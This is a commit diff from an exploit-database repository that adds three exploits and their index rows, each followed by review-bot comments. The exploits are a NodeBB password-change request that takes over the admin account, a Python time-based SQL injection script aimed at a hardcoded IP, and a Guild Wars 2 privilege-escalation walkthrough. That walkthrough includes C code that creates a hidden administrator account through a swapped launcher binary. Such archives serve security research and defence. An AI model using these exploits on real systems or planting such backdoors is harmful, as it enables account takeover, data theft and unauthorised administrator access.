DB: 2020-10-15
3 changes to exploits/shellcodes

Guild Wars 2 - Insecure Folder Permissions
TimeClock Software 0.995 - Multiple SQL Injections
TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections
TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection
NodeBB Forum 1.12.2-1.14.2 - Account Takeover
This commit is contained in:
parent 973a669c08
commit a3aad6c41a
4 changed files with 182 additions and 1 deletions
21
exploits/multiple/webapps/48875.txt
Normal file
@ -0,0 +1,21 @@
# Exploit Title: NodeBB Forum 1.12.2-1.14.2 - Account Takeover
# Date: 2020-08-18
# Exploit Author: Muhammed Eren Uygun
# Vendor Homepage: https://nodebb.org/
# Software Link: https://github.com/NodeBB/NodeBB
# Version: 1.12.2-1.14.2
# Tested on: Linux
# CVE : CVE-2020-15149 - https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hr66-c8pg-5mg7
Impact:
----------------------
A bug in this validation logic made it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to a privilege escalation event due via an account takeover.

Bug PoC:
----------------------
Blog: https://medium.com/bugbountywriteup/privilege-escalation-via-account-takeover-on-nodebb-forum-software-512-a593a7b1b4a4
1- Create a user
2- Go to password change page
3- Change password with proxy
427["user.changePassword",("currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5)])
4- Replace the uid on the request with 1, which is the uid value of the admin user, and send the request.
5- So you can login with this password to admin user.
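Review bot: the socket.io frame shown under step 3 is not well-formed: the event argument uses parentheses where a JSON object needs braces, and the trailing `)])` leaves the brackets unbalanced, so the line neither reproduces the captured request nor works as a reference for anyone writing a detection rule for `user.changePassword` calls whose `uid` differs from the caller's session; paste the frame exactly as the proxy captured it. The header lists the affected range 1.12.2-1.14.2 and links the vendor advisory but never states the patched release, so add the fixed version next to `# Version:` so readers can tell at a glance whether an instance still needs upgrading. Minor wording: "privilege escalation event due via an account takeover" should read "privilege escalation via account takeover".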
50
exploits/php/webapps/48874.py
Executable file
@ -0,0 +1,50 @@
#!/usr/bin/python3

# Exploit Title: TimeClock Software 1.01 Authenticated Time-Based SQL Injection
# Date: July 21, 2020
# Exploit Author: François Bibeau
# Co Author: Tyler Butler, http://tbutler.org, https://twitter.com/tbutler0x90
# Vendor Homepage: http://timeclock-software.net/
# Software Link: http://timeclock-software.net/timeclock-download.php
# Version: 1.01
# Tested on: Ubuntu 18.04.3 (LTS) x64, mysql 5.7, php 7.2.1-apache

import time
import requests


login_url = 'http://159.203.41.34/login_action.php' # Ensure to change ip to match target
login_data = {'username':'fred','password':'fred','submit':'Log In'}
headers = {'User-Agent': 'Mozilla/5.0'}

# init session & login
session = requests.Session()
session.post(login_url,headers=headers,data=login_data)

# static list provided for PoC, could use a text file
users = ['john','bill','tim','fred','garry','sid','admin']

for user in users:
url = "http://159.203.41.34/add_entry.php"
payload = f"' OR IF((SELECT username FROM user_info WHERE username='{user}')='{user}', SLEEP(5), NULL)='"

data = {'data_month': '1',
'data_day': '1',
'data_year': '1',
'type_id': '5',
'hours': '1',
'notes': payload,
'submit': 'Add'}

print(f'Checking user {user}... ', end = '')

start = time.time()
response = session.post(url,data=data)
end = time.time()

delay = end - start

if delay > 5:
print('User found!')
else:
print('')
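Review bot: the target host `159.203.41.34` is hardcoded twice (in `login_url` and again in `url` inside the loop) but only the first carries the "change ip" comment, so someone who edits only the commented line keeps sending the loop's requests to the author's test host; hoist it into a single base URL variable. The login POST's response is never inspected, so an expired or wrong credential pair silently turns every subsequent probe into a false negative; check the status code or a marker in the response body before entering the loop. The success test `delay > 5` sits exactly on the `SLEEP(5)` boundary, so a slow but unaffected server can report "User found!"; a baseline request and a margin above the sleep value would make the result trustworthy, and the unused `response` variable can be dropped. Also `# Date: July 21, 2020` does not match the 2020-07-23 recorded for this entry in files.csv.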
107
exploits/windows/local/48876.txt
Normal file
@ -0,0 +1,107 @@
# Exploit Title: Guild Wars 2 - Insecure Folder Permissions
# Date: 2020-10-09
# Exploit Author: George Tsimpidas
# Software Link : https://account.arena.net/welcome
# Version Build : 106915
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
# Category: local



Vulnerability Description:

Guild Wars 2 Launcher (Gw2-64.exe) suffers from an elevation of privileges
vulnerability which can be used by a simple user that can change the
executable file
with a binary of choice. The vulnerability exist due to the improper
permissions,
with the 'F' flag (Full) for 'Everyone' group, making the entire directory
'Guild Wars 2' and its files and sub-dirs world-writable.


# Local Privilege Escalation Proof of Concept


D:\icacls "Guild Wars 2"
Guild Wars 2 Everyone:(F)
Everyone:(OI)(CI)(IO)(M,WDAC,WO,DC)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)

## Insecure File Permission

D:\Guild Wars 2icacls Gw2-64.exe
Gw2-64.exe Everyone:(F)
Everyone:(I)(F)
BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
BUILTIN\Users:(I)(RX)



#0. Download & install

#1. Create low privileged user & change to the user
## As admin

C:\net user lowpriv Password123! /add
C:\net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
User name lowpriv
Local Group Memberships *Users
Global Group memberships *None

#2. Move the Service EXE to a new name

D:\Guild Wars 2whoami
lowpriv

D:\Guild Wars 2move Gw2-64.exe Gw2-64.frey.exe
1 file(s) moved.

#3. Create malicious binary on kali linux
## Add Admin User C Code

kali# cat addAdmin.c
int main(void){
system("net user placebo mypassword /add");
system("net localgroup Administrators placebo /add");
WinExec("D:\\Guild Wars 2\\Gw2-64.frey.exe",0);
return 0;
}

## Compile Code
kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Gw2-64.exe

#4. Transfer created 'Gw2-64' to the Windows Host

#5. Move the created 'Gw2-64' binary to the 'D:\Guild Wars 2' Folder

D:\Guild Wars 2move C:\Users\lowpriv\Downloads\Gw2-64.exe .

#6. Check that exploit admin user doesn't exists

D:\Guild Wars 2net user placebo

The user name could not be found

#6. Reboot the Computer

D:\Guild Wars 2shutdown /r

#7. Login & now start the Guild Wars 2 Game, back doored launcher will be
executed, and the user placebo will be created, and added to the
Administrators group.

C:\Users\lowprivnet user placebo | findstr /i "Membership Name" | findstr
/v "Full"

User name placebo
Local Group Memberships *Administrators *Users
Global Group memberships *None
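Review bot: the steps run #0 to #7 but `#6` is used twice (the "Check that exploit admin user doesn't exists" step and the "Reboot the Computer" step), so renumber, and "doesn't exists" should be "doesn't exist". The `addAdmin.c` listing calls `system` and `WinExec` without `#include <stdlib.h>` and `#include <windows.h>`, and the compile line links `-l ws2_32` although nothing in the listing uses Winsock; add the includes and drop the flag so the listing builds as printed. The write-up stops at the proof of concept and never states a remediation: the `icacls` output shows the `Everyone:(F)` ACE on the 'Guild Wars 2' directory and on `Gw2-64.exe`, so one sentence telling administrators to remove that ACE (for example by resetting the folder to inherited ACLs) and one telling defenders what to look for (a renamed original such as `Gw2-64.frey.exe` sitting next to a freshly written `Gw2-64.exe`, or an unexpected local account appearing after a launcher start) would make the entry useful beyond reproduction. Also `# Date: 2020-10-09` does not match the 2020-10-14 recorded for this entry in files.csv.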
@ -10388,6 +10388,7 @@ id,file,description,date,author,type,platform,port
48839,exploits/windows/local/48839.py,"BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)",2020-09-29,"Christian Vierschilling",local,windows,
48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows,
48873,exploits/windows/local/48873.txt,"Battle.Net 1.27.1.12428 - Insecure File Permissions",2020-10-13,"George Tsimpidas",local,windows,
48876,exploits/windows/local/48876.txt,"Guild Wars 2 - Insecure Folder Permissions",2020-10-14,"George Tsimpidas",local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
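Review bot: the new 48876 row is dated 2020-10-14, but the header of exploits/windows/local/48876.txt added in this same commit says `# Date: 2020-10-09`; the two should agree, or the row should follow whichever convention (author date versus publication date) the rest of the file uses. The row is otherwise consistent with the neighbouring 48873 entry by the same author (same path scheme, `local,windows,` and an empty port column).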
@ -38881,7 +38882,7 @@ id,file,description,date,author,type,platform,port
39394,exploits/multiple/webapps/39394.txt,"ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation",2016-02-01,GraphX,webapps,multiple,80
39399,exploits/multiple/webapps/39399.txt,"Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery",2016-02-02,"Kaustubh G. Padwad",webapps,multiple,
39402,exploits/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",webapps,jsp,80
39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80
39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80
39405,exploits/jsp/webapps/39405.py,"Jive Forums 5.5.25 - Directory Traversal",2016-02-03,ZhaoHuAn,webapps,jsp,80
39407,exploits/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting",2016-02-03,Portcullis,webapps,hardware,
39408,exploits/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",webapps,hardware,
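Review bot: the rewritten 39404 description introduces a stray space inside the parenthesis, `(Authenticated )`; the 48874 row added elsewhere in this commit spells it `(Authenticated)`, so fix the new line to match and keep the qualifier searchable as one token.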
@ -40692,6 +40693,8 @@ id,file,description,date,author,type,platform,port
48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php,
48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware,
48872,exploits/php/webapps/48872.txt,"berliCRM 1.0.24 - 'src_record' SQL Injection",2020-10-13,"Ahmet Ümit BAYRAM",webapps,php,
48874,exploits/php/webapps/48874.py,"TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection",2020-07-23,"François Bibeau",webapps,php,
48875,exploits/multiple/webapps/48875.txt,"NodeBB Forum 1.12.2-1.14.2 - Account Takeover",2020-10-14,"Muhammed Eren Uygun",webapps,multiple,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
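Review bot: the 48874 description reads `TimeClock Software 1.01 0 - (Authenticated) ...` while the script header added in this commit says `# Version: 1.01`, so the ` 0` looks like a typo and should go. Dates also disagree with the files they index: the 48874 row says 2020-07-23 against the script's `Date: July 21, 2020`, and the 48875 row says 2020-10-14 against `# Date: 2020-08-18` in 48875.txt; apply one convention to both rows.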